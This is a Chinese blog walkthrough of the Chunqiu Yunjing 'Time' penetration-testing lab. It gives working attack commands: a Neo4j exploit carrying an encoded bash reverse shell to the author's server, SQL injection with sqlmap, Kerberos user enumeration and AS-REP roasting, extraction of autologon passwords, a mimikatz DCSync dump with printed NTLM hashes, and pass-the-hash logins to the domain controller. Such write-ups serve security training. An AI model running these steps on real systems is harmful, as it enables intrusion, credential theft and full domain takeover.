春秋云境 - - Time靶场

已于 2024-02-27 17:14:48 修改
阅读量940 收藏 19
点赞数 24
分类专栏: 春秋云境 渗透笔记 文章标签: 经验分享 安全 网络安全 安全威胁分析
于 2024-02-27 16:34:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44640313/article/details/136325955
版权

感谢苟哥,没他还真做不了,挂他博客供大家学习,su✌  

fushulingのblog – 狗and猫的安全笔记

flag01

先扫内网

fscan.exe -h 39.99.233.234 -p 1-65535

 

7474、7687端口可以看出是neo4jCVE),有个Neo4j Browser,存在nday,直接执行命令(base64编码中的ip和端口改成自己vps的ip和相应的端口) 

java -jar ./rhino_gadget.jar rmi://39.99.151.101:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC9wb3J0IDA+JjE=}|{base64,-d}|{bash,-i}"

vps上监听端口

nc -lvvp 9999  #之间在base64中开放了9999端口

get shell

找到flag01

find / -name flag*

flag02

ifconfig查看一下,内网网段172.22.6.0/24

将frp和fscan传入tmp目录下(不是tmp的话没有权限)

A机有文件要通过wget上传到B机,则需要在A机开启http服务

A机

python3 -m http.server 80

B机 

wget http://vps:80/root/frp/frpc

fscan开扫

分析得到下面的结果

  1. 172.22.6.12 域控

  2. 172.22.6.25 域内机器

  3. 172.22.6.36 当前机器

  4. 172.22.6.38 某后台登录界面

 开代理访问172.22.6.38,可参考我苟哥的博客内网代理搭建 – fushulingのblog

是个web服务,然后需要我们抓包分析一下,burpsuite本身就可以建立socks5代理,非常方便,所以我们就可以抓代理之后的包了

抓的包:


POST /index.php HTTP/1.1
Host: 172.22.6.38
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.22.6.38/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://172.22.6.38
Connection: close
Upgrade-Insecure-Requests: 1

username=admin&password=123456

直接sqlmap一把梭,发现存在时间盲注,再爆破--current-db、table

 

flag03

把users表中的用户名收集成字典username.txt,将下面命令生成的csv粘贴到usersname.txt里

proxychains sqlmap -r kkk.txt --dump -D oa_db -T oa_users -C email


域内用户枚举:

当主机不在域内时,我们可以通过域内用户枚举来探测域内的用户。

我们可以使用Kerbrute工具进行探测。

在kerberos的AS-REQ认证中当cname值中的用户不存在时返回包提示KDC_ERR_C_PRINCIPAL_UNKNOWN,所以当我们没有域凭证时,可以通过Kerberos pre-auth从域外对域用户进行用户枚举

将kerbrute_linux_386 userenum,username.txt上传到最开始的主机上

kerbrute_windows_amd64.exe userenum --dc 10.1.1.1 -d hack.com 1.txt
                                        域控ip        域名       字典
chmod +x kerbrute_linux_386
./kerbrute_linux_386 userenum --dc 172.22.6.12 -d xiaorang.lab usersname.txt -t 10

将枚举出来的用户做成字典result.txt

weixian@xiaorang.lab
gaiyong@xiaorang.lab
shuzhen@xiaorang.lab
wengbang@xiaorang.lab
xiqidi@xiaorang.lab
xuanjiang@xiaorang.lab
yuanchang@xiaorang.lab
lvhui@xiaorang.lab
wenbo@xiaorang.lab
zhenjun@xiaorang.lab
jinqing@xiaorang.lab
weixian@xiaorang.lab
weicheng@xiaorang.lab
yangju@xiaorang.lab
haobei@xiaorang.lab
jizhen@xiaorang.lab
jingze@xiaorang.lab
rubao@xiaorang.lab
liangliang@xiaorang.lab
tangshun@xiaorang.lab
zhaoxiu@xiaorang.lab
chouqian@xiaorang.lab
beijin@xiaorang.lab
xiyi@xiaorang.lab
jicheng@xiaorang.lab
qiyue@xiaorang.lab
chenghui@xiaorang.lab
yanglang@xiaorang.lab
chebin@xiaorang.lab
jihuan@xiaorang.lab
pengyuan@xiaorang.lab
duanmuxiao@xiaorang.lab
fusong@xiaorang.lab
yifu@xiaorang.lab
gaijin@xiaorang.lab
hongzhi@xiaorang.lab
luwan@xiaorang.lab
zhufeng@xiaorang.lab
tangrong@xiaorang.lab
dongcheng@xiaorang.lab
huabi@xiaorang.lab
lili@xiaorang.lab
rangsibo@xiaorang.lab
lianhuangchen@xiaorang.lab
wohua@xiaorang.lab
haoguang@xiaorang.lab
wenshao@xiaorang.lab
langying@xiaorang.lab
diaocai@xiaorang.lab
lianggui@xiaorang.lab
manxue@xiaorang.lab
baqin@xiaorang.lab
louyou@xiaorang.lab
chengqiu@xiaorang.lab
wenbiao@xiaorang.lab
maqun@xiaorang.lab
weishengshan@xiaorang.lab
chuyuan@xiaorang.lab
wenliang@xiaorang.lab
yulvxue@xiaorang.lab
luyue@xiaorang.lab
lezhong@xiaorang.lab
ganjian@xiaorang.lab
guohong@xiaorang.lab
sheweiyue@xiaorang.lab
pangzhen@xiaorang.lab
dujian@xiaorang.lab
lidongjin@xiaorang.lab
yexing@xiaorang.lab
hongqun@xiaorang.lab
maoda@xiaorang.lab
zhangxin@xiaorang.lab
qiaomei@xiaorang.lab
ganjian@xiaorang.lab

然后进行AS_REP Roasting攻击:

AS_REP Roasting是一种对用户账户进行离线爆破的方式,需要关闭预身份验证,而此选项又是默认开启的,所以有一定的限制,默认开启的预身份验证是会记录密码错误次数来防止爆破的,关闭预身份验证后,在进行AS_REQ之后的时候,KDC不会进行任何验证就将TGT和用该用户Hash加密的Login Session Key返回,由于AS_REP的数据包中Login Session Key的是由用户Hash进行加密的,因此,可以对获取到的用户Hash加密的Login Session Key进行离线爆破,得到对应用户的明文密码
对于域用户,如果设置了选项Do not require Kerberos preauthentication(不要求Kerberos预身份认证),此时向域控制器的88端口发送AS-REQ请求,对收到的AS-REP内容重新组合,能够拼接成”Kerberos 5 AS-REP etype 23”(18200)的格式,接下来可以使用hashcat或是john对其破解,最终获得该用户的明文口令

因为当前主机不在域内,所以使用impacket的GetNPUsers.py进行攻击

利用BloodHound与Impacket进行域渗透实战 - FreeBuf网络安全行业门户

proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile username.txt xiaorang.lab/

得到2个用户

使用hashcat解密

hashcat -m 18200 --force -a 0 '$krb5asrep$23$zhangxin@XIAORANG.LAB:e414f4692a6b1d0905e8ed118747ac6e$95ec406c7cdae081a496fe8009a23e684f0612d0632c903e1b34ce66275421c5d0f8125c8e651bf93ddee83bab492833c6af3316177096000e7e302359774ab66f05c254ad9c61ba9407756681e532c031f65961571469d15a08a069ea0ab26d38d876c2808055c0724c9b30dcc29ba9e62d56d8f697ea29d200f3c58bd107e8f39e16d34aa76dcb26d58e7d7e59a1d3160d249451a73fe6ba1a0d09d4a5210f2b6aeb09cf979a0ad51345244b21769878652f5c88223c4ed6648c650413bc31192e835cf74f274b20604a8e9ad3db6ec6e28f7b24452eaf7c456a7e4282e1bba9ffddc43915cfd1349c56a0' /usr/share/wordlists/rockyou.txt

获得账号和密码

zhangxin@XIAORANG.LAB:strawberry

rdp随便试试,登录了172.22.6.25,然后查看一下用户

xiaorang.lab\ZHANGXIN
strawberry

看别人说这里有理由怀疑是开了Windows 自动登录,反正可以抓密码了

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

DefaultUserName    REG_SZ    yuxuan
DefaultPassword    REG_SZ    Yuxuan7QbrgZ3L
DefaultDomainName    REG_SZ    xiaorang.lab

换这个账号登了一下,用BloodHound分析域内关系,发现这个用户滥用了SID历史功能(SIDHistory是一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限),借一张别人的图:

我们就可以通过这个滥用直接攻击DC了,因为我们保留域管理员的访问权限了,所以直接dump哈希

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

1103    shuzhen 07c1f387d7c2cf37e0ca7827393d2327
1104    gaiyong 52c909941c823dbe0f635b3711234d2e
1106    xiqidi  a55d27cfa25f3df92ad558c304292f2e
1107    wengbang        6b1d97a5a68c6c6c9233d11274d13a2e
1108    xuanjiang       a72a28c1a29ddf6509b8eabc61117c6c
1109    yuanchang       e1cea038f5c9ffd9dc323daf35f6843b
1110    lvhui   f58b31ef5da3fc831b4060552285ca54
1111    wenbo   9abb7115997ea03785e92542f684bdde
1112    zhenjun 94c84ba39c3ece24b419ab39fdd3de1a
1113    jinqing 4bf6ad7a2e9580bc8f19323f96749b3a
1115    yangju  1fa8c6b4307149415f5a1baffebe61cf
1117    weicheng        796a774eace67c159a65d6b86fea1d01
1118    weixian 8bd7dc83d84b3128bfbaf165bf292990
1119    haobei  045cc095cc91ba703c46aa9f9ce93df1
1120    jizhen  1840c5130e290816b55b4e5b60df10da
1121    jingze  3c8acaecc72f63a4be945ec6f4d6eeee
1122    rubao   d8bd6484a344214d7e0cfee0fa76df74
1123    zhaoxiu 694c5c0ec86269daefff4dd611305fab
1124    tangshun        90b8d8b2146db6456d92a4a133eae225
1125    liangliang      c67cd4bae75b82738e155df9dedab7c1
1126    qiyue   b723d29e23f00c42d97dd97cc6b04bc8
1127    chouqian        c6f0585b35de1862f324bc33c920328d
1128    jicheng 159ee55f1626f393de119946663a633c
1129    xiyi    ee146df96b366efaeb5138832a75603b
1130    beijin  a587b90ce9b675c9acf28826106d1d1d
1131    chenghui        08224236f9ddd68a51a794482b0e58b5
1132    chebin  b50adfe07d0cef27ddabd4276b3c3168
1133    pengyuan        a35d8f3c986ab37496896cbaa6cdfe3e
1134    yanglang        91c5550806405ee4d6f4521ba6e38f22
1135    jihuan  cbe4d79f6264b71a48946c3fa94443f5
1136    duanmuxiao      494cc0e2e20d934647b2395d0a102fb0
1137    hongzhi f815bf5a1a17878b1438773dba555b8b
1138    gaijin  b1040198d43631279a63b7fbc4c403af
1139    yifu    4836347be16e6af2cd746d3f934bb55a
1140    fusong  adca7ec7f6ab1d2c60eb60f7dca81be7
1141    luwan   c5b2b25ab76401f554f7e1e98d277a6a
1142    tangrong        2a38158c55abe6f6fe4b447fbc1a3e74
1143    zhufeng 71e03af8648921a3487a56e4bb8b5f53
1145    dongcheng       f2fdf39c9ff94e24cf185a00bf0a186d
1146    lianhuangchen   23dc8b3e465c94577aa8a11a83c001af
1147    lili    b290a36500f7e39beee8a29851a9f8d5
1148    huabi   02fe5838de111f9920e5e3bb7e009f2f
1149    rangsibo        103d0f70dc056939e431f9d2f604683c
1150    wohua   cfcc49ec89dd76ba87019ca26e5f7a50
1151    haoguang        33efa30e6b3261d30a71ce397c779fda
1152    langying        52a8a125cd369ab16a385f3fcadc757d
1153    diaocai a14954d5307d74cd75089514ccca097a
1154    lianggui        4ae2996c7c15449689280dfaec6f2c37
1155    manxue  0255c42d9f960475f5ad03e0fee88589
1156    baqin   327f2a711e582db21d9dd6d08f7bdf91
1157    chengqiu        0d0c1421edf07323c1eb4f5665b5cb6d
1158    louyou  a97ba112b411a3bfe140c941528a4648
1159    maqun   485c35105375e0754a852cee996ed33b
1160    wenbiao 36b6c466ea34b2c70500e0bfb98e68bc
1161    weishengshan    f60a4233d03a2b03a7f0ae619c732fae
1163    chuyuan 0cfdca5c210c918b11e96661de82948a
1164    wenliang        a4d2bacaf220292d5fdf9e89b3513a5c
1165    yulvxue cf970dea0689db62a43b272e2c99dccd
1166    luyue   274d823e941fc51f84ea323e22d5a8c4
1167    ganjian 7d3c39d94a272c6e1e2ffca927925ecc
1168    pangzhen        51d37e14983a43a6a45add0ae8939609
1169    guohong d3ce91810c1f004c782fe77c90f9deb6
1170    lezhong dad3990f640ccec92cf99f3b7be092c7
1171    sheweiyue       d17aecec7aa3a6f4a1e8d8b7c2163b35
1172    dujian  8f7846c78f03bf55685a697fe20b0857
1173    lidongjin       34638b8589d235dea49e2153ae89f2a1
1174    hongqun 6c791ef38d72505baeb4a391de05b6e1
1175    yexing  34842d36248c2492a5c9a1ae5d850d54
1176    maoda   6e65c0796f05c0118fbaa8d9f1309026
1177    qiaomei 6a889f350a0ebc15cf9306687da3fd34
502     krbtgt  a4206b127773884e2c7ea86cdd282d9c
1178    wenshao b31c6aa5660d6e87ee046b1bb5d0ff79
500     Administrator   04d93ffd6f5f6e4490e0de23f240a5e9
1000    DC-PROGAME$     5c76d177587a06495af3a7494ffb2e1f
1180    yuxuan  376ece347142d1628632d440530e8eed
1181    WIN2019$        91c31e8e8aa3270652c7e1e11fa17b3b
1179    zhangxin        d6c5976e07cdb410be19b84126367e3d

直接把域管理员哈希dump了,所以相当于已经拿下域控了,哈希传递登一下其他两台机器拿一下flag就结束了

smb获得flag03

proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag04

获得域控的shell

proxychains impacket-wmiexec -hashes :04d93ffd6f5f6e4490e0de23f240a5e9 Administrator@172.22.6.12

参考博客:

春秋云境Time-WP【一遍过】-CSDN博客 

0e1G7
关注
  • 24
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-bypass靶场
11-10
sqli-bypass靶场
sqli-labs靶场
02-12
sqli-labs靶场
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 6115
春秋云境系列靶场记录合集,不更新了哈……
春秋云境Time-WP【一遍过】
weixin_63576152的博客
10-11 348
重置了很多次靶机,所以靶机ip变化请忽略。
春秋云境 CVE-2019-13086
HMX404的博客
01-28 237
CVE-2019-13086 POC,RUN一下就出来了,不需要思考原理,我也不知道原理。替换你的靶场URL,
春秋云境】CVE-2018-7448
comingsoooooon的博客
04-04 335
春秋云境靶场解题方法,CVE-2018-7448
春秋云境】CVE-2022-22733靶场WP
果粒程
12-07 1448
春秋云境】CVE-2022-22733靶场WP
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1358
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
百度大模型算法实习岗上岸经验分享
最新发布
2201_75499313的博客
06-02 814
节前,我们星球组织了一场算法岗技术&面试讨论会,邀请了一些互联网大厂朋友、参加社招和校招面试的同学.针对算法岗技术趋势、大模型落地项目经验分享、新手如何入门算法岗、该如何准备、面试常考点分享等热门话题进行了深入的讨论。大家好,今天分享我们星球中一位球友的上岸百度大模型算法岗经验分享。该同学来自天大,2024找暑期实习期间也算是历经坎坷,最后去了百度做大模型相关工作。
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1014
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
linux系统安全及应用
Alone8046的博客
05-30 622
一、新的服务器到手该如何部署:1.配置IP地址,网关,dns解析,内外网。3.磁盘分区:lvm及raid。二、应用:1.不需要或者不想登录的用户设置为nologin:usermod -s nologin +用户。解锁文件:chattr -i /etc/passwd。提供了一种标准的身份认证的接口(对账号权限进行控制),可以允许管理员定制化配置各种认证方式和方法。(配置的时候一定要注意:有限放开原则,用什么给什么,不需要的不加)会话管理模块:管理用户的会话,记录会话信息,注销用户的会话,远程终端连接。
登录安全分析报告:小米官网注册
Explinks的博客
05-29 1144
图形验证及交互验证方式的安全性到底如何?请看具体分析
云端数据提取:安全、高效地利用无限资源
Shaidou_Data的博客
05-30 742
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1112
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
富格林:谨防被骗实现安全交易
fgl100的博客
05-30 394
富格林指出,进行现货黄金投资的时候,有不少投资者都会犯下这个危及安全交易的毛病,就是没有合理控制好交易成本。如果投资成本没有控制好,把自己账户资金的全部都放进去,那么一旦逆势波动,就可能会发生爆仓的情况。成本和仓位不混为一谈,有些投资者认为成本和仓位是一样的,但并不是的,成本是投资者,投入多少金额的。如果投资的仓位较大,成本也会大,但是成本大,仓位不一定大,同时大仓位带来的收益与风险是并存的。以上的是富格林分享的控制费用成本的实用方法,有助于帮助投资者通过减少支出,从而增加利润。
春秋云境CVE-2022-29464
09-05
春秋云境CVE-2022-29464是指WSO2 API Manager 文件上传漏洞的CVE编号。这个漏洞允许攻击者通过上传恶意文件来执行任意代码,进而导致服务器受到攻击。根据引用,在GitHub上有一个项目,其中包含了与该漏洞相关的利用代码和解释。引用提供了一个具体的漏洞利用脚本的地址。如果您想了解更多关于该漏洞的细节和分析,可以参考引用中提到的文章。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值